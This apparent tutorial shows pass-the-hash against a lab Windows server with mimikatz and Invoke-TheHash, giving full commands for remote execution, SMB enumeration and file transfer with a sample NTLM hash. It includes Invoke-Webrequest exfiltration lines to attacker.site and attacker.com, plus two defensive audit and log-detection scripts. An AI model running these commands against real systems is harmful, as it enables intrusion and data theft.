Pass-the-hash attack (how to use NTLM without cracking a password)

This is the second part of a series on auditing Windows security and assessing the strength of user passwords. It is recommended that you start with the first part, “How to hack a Windows password”.

How to use NTLM hash without password cracking: Pass-the-hash attack

A pass-the-hash attack allows one to use the hash directly, without brute-forcing the password.

mimikatz can perform the well-known 'Pass-The-Hash' operation: it starts a process as another user using the NTLM hash of that user's password instead of the password itself. To do this, the program starts the process with fake authentication, then replaces the fake credential material (the NTLM hash of a fake password) with the real one (the NTLM hash of the real password).

To perform this attack, mimikatz first needs to enable the debug privilege for its own process and elevate its token:

privilege::debug
token::whoami
token::elevate

Then you need to run a command of the form:

sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND

Instead of DOMAIN, specify the fully qualified domain name, or the name of the workgroup if this is done for a local user. The /run:COMMAND option can be omitted, in which case cmd.exe is executed (a command prompt opens).

Example:

sekurlsa::pth /user:Alexey /domain:workgroup /ntlm:ca76a176340f0291e1cc8ea7277fc571 /run:taskmgr

But it seems that this is not working (maybe I'm doing something wrong).

But the Invoke-TheHash program certainly works: it uses the NTLM hash to execute commands on remote systems, as well as to collect information and work with files in network shares. That is, none of these actions require recovering the password from the NTLM hash.

Invoke-TheHash includes the following features:

  • Invoke-WMIExec (running commands through WMI)
  • Invoke-SMBExec (executing commands through SMB (PsExec))
  • Invoke-SMBEnum (enumerates users, groups, network sessions, and shared resources)
  • Invoke-SMBClient (SMB Client)
  • Invoke-TheHash (to run Invoke-TheHash functions against multiple targets)

How to install and run Invoke-TheHash on Windows

Invoke-TheHash scripts are written in PowerShell, so it is highly recommended that you read the article “How to set up the PowerShell environment on Windows and Linux” in which you will find answers to many questions about using PowerShell, as well as an example of fixing a bug in the Invoke-TheHash script when it starts on Linux.

Download script files: https://github.com/Kevin-Robertson/Invoke-TheHash/archive/master.zip

Go to the script directory (you may have a different path):

cd C:\Users\MiAl\Downloads\Invoke-TheHash-master\

To start, import the functions:

Import-Module ./Invoke-TheHash.psd1

And use these functions to run:

Invoke-WMIExec
Invoke-SMBExec
Invoke-SMBEnum
Invoke-SMBClient
Invoke-TheHash

As the target computer we will use Windows Server 2019; the computer name is HACKWARE-SERVER and its IP is 192.168.0.53. When you launch the attack from Windows, you can use either the computer name or the IP; when you launch it from Linux, the computer name is unlikely to be resolved to an IP, so it is better to specify the IP address.

The NTLM hash extracted from this computer is:

User : Администратор
  Hash NTLM: 5187b179ba87f3ad85fea3ed718e961f

On Windows Server, an Administrator account cannot be created without a password or with a weak password, so we assume that it was not possible to crack the NTLM hash. Let's consider how we can use it anyway.

NTLM hash and command execution via WMI

Windows Management Instrumentation (WMI) is one of the core technologies for centralized management and monitoring of various parts of the computer infrastructure running the Windows platform.

Without going into the details of WMI, this technology is used to manage Windows computers over the network and, among other things, allows one to execute commands on remote computers. The drawback of a practical attack via WMI is that on regular Windows workstations remote WMI access is disabled by default and/or blocked by the firewall. On Windows Server, however, WMI is available.
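Which settings decide whether a hash like this one is usable over the network at all, as an added audit example (not code from the article or Invoke-TheHash): the built-in Administrator (RID 500) is exempt from UAC remote restrictions, so by default its hash alone is enough for remote WMI or SMB administration of a workgroup server, while inbound NTLM and the accepted NTLM variants are governed by the Lsa and MSV1_0 policy values. The function evaluates a dict of those registry values (read_current() fills it from the registry on a Windows host); the two sample dicts are constructed.

```python
"""Audit the Windows settings that decide whether a local account's NTLM hash is
usable for remote administration, and whether weak NTLM variants are accepted.

Added example for this article (not code from the article or Invoke-TheHash).
Registry locations and meanings are Microsoft's documented policy values; the
audit works on a plain dict so it can be checked offline, and read_current()
fills that dict from the registry on a Windows host."""
import sys
from typing import Dict, List, Optional

# value name -> subkey under HKEY_LOCAL_MACHINE
REGISTRY_LOCATIONS = {
    "LocalAccountTokenFilterPolicy": r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
    "FilterAdministratorToken": r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
    "RestrictReceivingNTLMTraffic": r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0",
    "LmCompatibilityLevel": r"SYSTEM\CurrentControlSet\Control\Lsa",
    "NoLMHash": r"SYSTEM\CurrentControlSet\Control\Lsa",
}

# Effective defaults on Windows Vista / Server 2008 and later when the value is absent
DEFAULTS = {
    "LocalAccountTokenFilterPolicy": 0,
    "FilterAdministratorToken": 0,
    "RestrictReceivingNTLMTraffic": 0,
    "LmCompatibilityLevel": 3,
    "NoLMHash": 1,
}


def audit(values: Dict[str, Optional[int]]) -> List[str]:
    """Return one finding per weak setting; an empty list means nothing found."""
    v = {k: (values.get(k) if values.get(k) is not None else DEFAULTS[k]) for k in DEFAULTS}
    findings = []
    if v["LocalAccountTokenFilterPolicy"] == 1:
        findings.append("LocalAccountTokenFilterPolicy=1: UAC remote restrictions are off, so any "
                        "local administrator's hash gives full remote admin rights (set 0)")
    if v["FilterAdministratorToken"] != 1:
        findings.append("FilterAdministratorToken=0: the built-in Administrator (RID 500) is exempt "
                        "from UAC remote restrictions, so its hash alone is enough for remote "
                        "WMI/SMB administration (set 1 or disable the account)")
    if v["RestrictReceivingNTLMTraffic"] == 0:
        findings.append("RestrictReceivingNTLMTraffic=0: inbound NTLM is accepted from everyone "
                        "(1 denies domain accounts, 2 denies all; hash-only logons need NTLM)")
    elif v["RestrictReceivingNTLMTraffic"] == 1:
        findings.append("RestrictReceivingNTLMTraffic=1: only domain accounts are blocked; local "
                        "accounts such as Administrator can still authenticate with NTLM")
    if v["LmCompatibilityLevel"] < 5:
        findings.append(f"LmCompatibilityLevel={v['LmCompatibilityLevel']}: NTLMv1 responses "
                        "(and below level 4, LM responses) are still accepted (set 5)")
    if v["NoLMHash"] != 1:
        findings.append("NoLMHash=0: LM hashes are stored alongside NT hashes")
    return findings


def read_current() -> Dict[str, Optional[int]]:
    """Read the audited values from the local registry (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("read_current() needs the Windows registry")
    import winreg  # imported lazily so the module loads on other platforms
    out: Dict[str, Optional[int]] = {}
    for name, subkey in REGISTRY_LOCATIONS.items():
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                out[name] = int(winreg.QueryValueEx(key, name)[0])
        except OSError:
            out[name] = None  # value absent: the default applies
    return out


# Constructed samples: a workgroup server left at defaults, and a hardened one
DEFAULT_SERVER: Dict[str, Optional[int]] = {}
HARDENED_SERVER: Dict[str, Optional[int]] = {
    "LocalAccountTokenFilterPolicy": 0, "FilterAdministratorToken": 1,
    "RestrictReceivingNTLMTraffic": 2, "LmCompatibilityLevel": 5, "NoLMHash": 1,
}

if __name__ == "__main__":
    for label, sample in (("defaults", DEFAULT_SERVER), ("hardened", HARDENED_SERVER)):
        print(f"[{label}] {len(audit(sample))} finding(s)")
        for f in audit(sample):
            print("  -", f)
```

LmCompatibilityLevel and NoLMHash reduce cracking and relay exposure but do not stop pass-the-hash by themselves, because the NTLMv2 response is computed from the same NT hash; what blocks hash-only logons is refusing inbound NTLM (RestrictReceivingNTLMTraffic=2, workable only where Kerberos is available, i.e. in a domain) or denying remote administration to local accounts. The firewall rules for remote WMI are not registry values and need a separate check.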

To make sure WMI is available on a remote computer, you need to run a command of the form:

Get-WmiObject -Namespace "root\cimv2" -Class Win32_LogicalDisk -ComputerName COMPUTERNAME_OR_IP -Credential COMPUTERNAME\USERNAME

For example, to check whether WMI is available for the Администратор user on the computer named HACKWARE-SERVER:

Get-WmiObject -Namespace "root\cimv2" -Class Win32_LogicalDisk -ComputerName HACKWARE-SERVER -Credential HACKWARE-SERVER\Администратор

An authentication prompt for the remote system appears.

If everything is fine (the password is correct and WMI is accessible), you will see information about the logical disks of the remote computer.

If you really do not have the password, go straight to Invoke-WMIExec.

You need to run a command of the form:

Invoke-WMIExec -Target TARGET -Domain DOMAIN -Username USERNAME -Hash HASH -Command "COMMAND" -verbose

Where:

  • -Target is the hostname or IP address of the target.
  • -Username is the username to use for authentication.
  • -Domain is the domain the computer belongs to. This parameter is not needed for local accounts or when @domain is appended to the username.
  • -Hash is the NTLM password hash used for authentication. Both LM:NTLM and NTLM formats are accepted.
  • -Command is the command to execute on the target. If no command is specified, the function only checks whether the user and hash have access to WMI on the target system.
  • -Sleep sets the value passed to Start-Sleep, in milliseconds. Default = 10 milliseconds.

The actual command I ran:

Invoke-WMIExec -Target HACKWARE-SERVER -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Command "powershell.exe ls C:\ > c:\file.txt" -verbose

In this example, the following command was executed on the remote system:

powershell.exe ls C:\ > c:\file.txt

That is, in PowerShell I ran

ls C:\ > c:\file.txt

Where

  • ls C:\ lists the root directory of the C: drive
  • > redirects the result to a file
  • c:\file.txt is the file the output of the ls command is redirected to

As a result, the file c:\file.txt should have been created on the remote system; let's check.

According to the described technology, you can run a backdoor or any other file or command.

Using the PowerShell Invoke-Webrequest command, you can transfer files from the attacked machine to another:

Invoke-Webrequest https://attacker.site/?base64=STRING
Invoke-Webrequest attacker.com/i.php -method POST -infile file.zip

How to execute commands through PsExec

In general, everything is very similar to the Invoke-WMIExec function:

Invoke-SMBExec -Target TARGET -Domain DOMAIN -Username USERNAME -Hash HASH -Command "COMMAND" -verbose

In my tests I was not able to redirect the output of SMBExec to a file, but the function works; for example, I executed the following command:

Invoke-SMBExec -Target HACKWARE-SERVER -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Command "powershell.exe Invoke-Webrequest 192.168.0.89" -verbose

Its payload is:

powershell.exe Invoke-Webrequest 192.168.0.89

This makes a request to a web server whose logs I have access to, and there I saw the corresponding line confirming that the request came from the attacked machine:

192.168.0.53 - - [04/Feb/2020:17:19:07 +0300] "GET / HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU) WindowsPowerShell/5.1.17763.771"
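The same log line can be turned into a detection, as an added example (not code from the article or Invoke-TheHash) that parses combined-format access log lines and flags the traces this article leaves on a web server: a WindowsPowerShell User-Agent, a base64-looking blob in a query parameter (the ?base64=STRING transfer shown earlier) and a POST from a PowerShell client (the -infile upload). The first sample line is the one from the article; the other three are constructed.

```python
"""Run simple detections over web-server access log lines.  Added example for
this article (not code from the article or Invoke-TheHash).  The log format is
the Apache/Nginx "combined" format; the first sample line is the one shown in
the article, the remaining lines are constructed."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
MIN_BLOB = 32  # shorter values are usually ids or tokens, not payloads


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def query_params(path: str) -> List[Tuple[str, str]]:
    """Split the query string without '+'-to-space decoding (keeps base64 intact)."""
    if "?" not in path:
        return []
    out = []
    for pair in path.split("?", 1)[1].split("&"):
        if pair:
            k, _, v = pair.partition("=")
            out.append((unquote(k), unquote(v)))
    return out


def flag(rec: Dict[str, str]) -> List[str]:
    """Return the reasons a request looks like scripted transfer, if any."""
    reasons = []
    scripted = "PowerShell" in rec["ua"]
    if scripted:
        reasons.append("WindowsPowerShell user agent")
    for k, v in query_params(rec["path"]):
        if len(v) >= MIN_BLOB and B64_RE.fullmatch(v):
            reasons.append(f"base64-looking value in query parameter {k!r}")
    if scripted and rec["method"] == "POST":
        reasons.append("POST from a scripted client (possible file upload)")
    return reasons


def scan(log_text: str) -> List[Tuple[Dict[str, str], List[str]]]:
    """Return (record, reasons) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            reasons = flag(rec)
            if reasons:
                hits.append((rec, reasons))
    return hits


def summarize(log_text: str) -> Dict[str, int]:
    """Flagged request count per client IP."""
    counts: Dict[str, int] = {}
    for rec, _ in scan(log_text):
        counts[rec["ip"]] = counts.get(rec["ip"], 0) + 1
    return counts


# First line is from the article; the rest are constructed sample data
SAMPLE_LOG = """\
192.168.0.53 - - [04/Feb/2020:17:19:07 +0300] "GET / HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU) WindowsPowerShell/5.1.17763.771"
192.168.0.77 - - [04/Feb/2020:17:20:11 +0300] "GET /index.html HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/72.0"
192.168.0.53 - - [04/Feb/2020:17:21:40 +0300] "GET /?base64=QWRkZWQgZXhhbXBsZSBkYXRhLCBub3QgcmVhbCBvdXRwdXQ= HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU) WindowsPowerShell/5.1.17763.771"
192.168.0.53 - - [04/Feb/2020:17:22:03 +0300] "POST /i.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT; Windows NT 10.0; ru-RU) WindowsPowerShell/5.1.17763.771"
"""

if __name__ == "__main__":
    for rec, reasons in scan(SAMPLE_LOG):
        print(f'{rec["ip"]} {rec["method"]} {rec["path"]}: ' + "; ".join(reasons))
    print(summarize(SAMPLE_LOG))
```

The User-Agent is trivially changed by the client, so this rule is a cheap first filter to combine with host-side telemetry (PowerShell script block logging, process creation events) rather than a standalone indicator.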

How to retrieve remote system information via SMB

Invoke-SMBEnum enumerates users, groups, network sessions, and shares (printers and network folders) over SMB 2.1, with or without SMB signing.

Usage:

Invoke-SMBEnum -Target TARGET -Domain DOMAIN -Username USERNAME -Hash HASH -verbose

All options are already familiar, but there is no -Command option. Instead, there is a new -Action option:

  • -Action (possible values: All, Group, NetSession, Share, User; default = Share) sets which enumeration action to perform.

An example of a real command:

Invoke-SMBEnum -Target HACKWARE-SERVER -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Action All -verbose

The command worked, but something was wrong with the output encoding.

SMB client with NTLM hash support

An SMB client lets you download files from and upload files to a network share. There are many SMB clients; what makes Invoke-SMBClient unique is that it uses the NTLM hash instead of the password:

Invoke-SMBClient -Domain DOMAIN -Username USERNAME -Hash HASH -Action ACTION -Source \\SERVER\FOLDER -Destination FILE -verbose

The action may be one of the following:

  • -Action (possible values: List, Recurse, Delete, Get, Put; default = List) is the action to execute:
      • List: lists the contents of the directory.
      • Recurse: lists the contents of the directory and all subdirectories.
      • Delete: deletes the file.
      • Get: downloads a file.
      • Put: uploads a file and sets its creation, last access and last write timestamps to match the original file.

Depending on the selected action, -Source may be the following:

  • -Source
      • List and Recurse: UNC directory path.
      • Delete: UNC file path.
      • Get: UNC file path.
      • Put: file to upload. If the full path is not specified, the file must be in the current directory. When the 'Modify' switch is used, 'Source' must be an array of bytes.

Depending on the selected action, -Destination (the new file) may be the following:

  • -Destination
      • List and Recurse: not used.
      • Delete: not used.
      • Get: if used, the value is the new name of the downloaded file. If the full path is not specified, the file is created in the current directory.
      • Put: UNC path for the uploaded file. The file name must be specified.

Let’s consider examples of the most common actions.

View the contents of the network folder named Share-Server on the computer \\HACKWARE-SERVER:

Invoke-SMBClient -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Action List -Source \\HACKWARE-SERVER\Share-Server -verbose

Download the changelog.txt file from the Share-Server share on the computer \\HACKWARE-SERVER and save it in the current working directory of the local computer under the name changelog_server.txt:

Invoke-SMBClient -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Action Get -Source \\HACKWARE-SERVER\Share-Server\changelog.txt -Destination changelog_server.txt -verbose

Upload the Invoke-TheHash.ps1 file located on the local computer in the C:\Users\MiAl\Downloads\Invoke-TheHash-master\ directory to the \\HACKWARE-SERVER computer in the Share-Server folder with the name Script.ps1:

Invoke-SMBClient -Domain WORKGROUP -Username Администратор -Hash 5187b179ba87f3ad85fea3ed718e961f -Action Put -Source C:\Users\MiAl\Downloads\Invoke-TheHash-master\Invoke-TheHash.ps1 -Destination \\HACKWARE-SERVER\Share-Server\Script.ps1 -verbose

Invoke-TheHash

Invoke-TheHash is a wrapper function for running the other Invoke-TheHash functions against multiple targets.

See the documentation for more details and examples: https://github.com/Kevin-Robertson/Invoke-TheHash

Conclusion

So, in this and the previous article we learned:

  • that the NTLM hash exists,
  • where the Windows user password is stored,
  • that if you use an online Microsoft account, the password hash is still stored on the local computer,
  • how to crack a Windows user password,
  • how to use the NTLM hash without brute-forcing it.
